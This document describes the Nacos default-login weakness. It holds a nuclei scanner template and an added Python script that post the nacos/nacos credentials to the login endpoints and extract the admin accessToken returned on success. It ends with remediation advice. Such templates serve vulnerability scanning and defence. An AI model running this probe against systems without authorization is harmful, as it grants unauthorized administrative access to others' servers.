Vulnerability description
Nacos ships with a built-in account whose username and password are both nacos. The template below posts those credentials to the login endpoint, once at the root (/v1/auth/users/login) and once under the /nacos context path, and reports a finding when the server answers 200 with a JSON body that carries an accessToken and username, i.e. a successful login with the unchanged default credentials.
id: nacos-default-login

info:
  name: Alibaba Nacos - Default Login
  author: SleepingBag945
  severity: high
  description: |
    The default username and password for Nacos are both nacos.
  classification:
    cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: alibaba
    product: nacos
    fofa-query: title=="Nacos"
  tags: nacos,default-login,alibaba,vuln

http:
  - raw:
      - |
        POST /v1/auth/users/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Nacos-Server
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /nacos/v1/auth/users/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Nacos-Server
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    attack: pitchfork
    payloads:
      username:
        - nacos
      password:
        - nacos
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"accessToken":'
          - '"username":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220662ec8fc8113d2b6fd41aca71d78b7be142b0dabf7c4ea4f040263d24f8e4d290220759a447b3e47b230eecbd60df50cb5adc44fdb4ebe30e93d539317879b317dd3:922c64590222798bb761d5b6d8e72950
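The same probe and decision rule as the template, re-implemented as a stand-alone script so the check can be run and reasoned about without nuclei. This is an added example, not part of the original template or of the Nacos project: the endpoint paths, credentials, User-Agent and matcher strings are taken from the template above; the sample HTTP responses embedded at the bottom are constructed for this example, not captured from a real server, and the base URL and port in the usage line are placeholders.

```python
"""Added example: re-implementation of the nacos-default-login probe and matchers.

Paths, credentials and matcher strings come from the nuclei template; the sample
responses below are constructed for offline testing, not captured from a real host.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_CREDS = ("nacos", "nacos")
# Same two paths as the template: Nacos served at the root, or under /nacos.
LOGIN_PATHS = ("/v1/auth/users/login", "/nacos/v1/auth/users/login")


def build_login_request(base_url, path, username, password):
    """Build the POST the template sends: form-encoded credentials, Nacos-Server UA."""
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + path,
        data=body,
        method="POST",
        headers={
            "User-Agent": "Nacos-Server",
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )


def matches_default_login(status, headers, body):
    """The template's three matchers ANDed together:
    status 200, a JSON content type, and a body containing both
    '"accessToken":' and '"username":'."""
    content_type = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    return (
        status == 200
        and "application/json" in content_type
        and '"accessToken":' in body
        and '"username":' in body
    )


def extract_token(body):
    """Return the accessToken from a successful login body, or None if absent/unparsable."""
    try:
        return json.loads(body).get("accessToken")
    except (ValueError, AttributeError):
        return None


def probe(base_url, username=DEFAULT_CREDS[0], password=DEFAULT_CREDS[1], timeout=5.0):
    """Try both paths and stop at the first hit (stop-at-first-match: true).
    Returns (path, token) on a match, None otherwise."""
    for path in LOGIN_PATHS:
        req = build_login_request(base_url, path, username, password)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                status = resp.status
                headers = dict(resp.headers.items())
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            # Rejected credentials typically arrive as a 4xx; still run the matcher on it.
            status, headers, body = e.code, dict(e.headers.items()), e.read().decode(errors="replace")
        except (urllib.error.URLError, OSError):
            continue  # path not reachable; try the next one
        if matches_default_login(status, headers, body):
            return path, extract_token(body)
    return None


# Constructed sample responses (not captured from a real Nacos instance).
SAMPLE_SUCCESS = (
    200,
    {"Content-Type": "application/json"},
    '{"accessToken":"eyJhbGciOiJIUzI1NiJ9.example","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}',
)
SAMPLE_FAILURE = (403, {"Content-Type": "text/plain;charset=UTF-8"}, "unknown user!")
# A JSON body that echoes the username but carries no token must not match.
SAMPLE_DECOY = (200, {"Content-Type": "application/json"}, '{"username":"nacos","message":"no token"}')

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"usage: {sys.argv[0]} http://TARGET:8848")  # placeholder target
        sys.exit(2)
    hit = probe(sys.argv[1])
    print(f"default login accepted at {hit[0]}" if hit else "default login rejected")
```

The matcher deliberately requires all three conditions, as the template does: a 200 with a JSON content type alone is not evidence, since the decoy response above shows a JSON body naming the user without issuing a token. When the probe returns a token, confirm the finding by presenting that accessToken to an authenticated Nacos API before reporting, and treat the fix as changing the nacos account password and making sure authentication is actually enforced on the server.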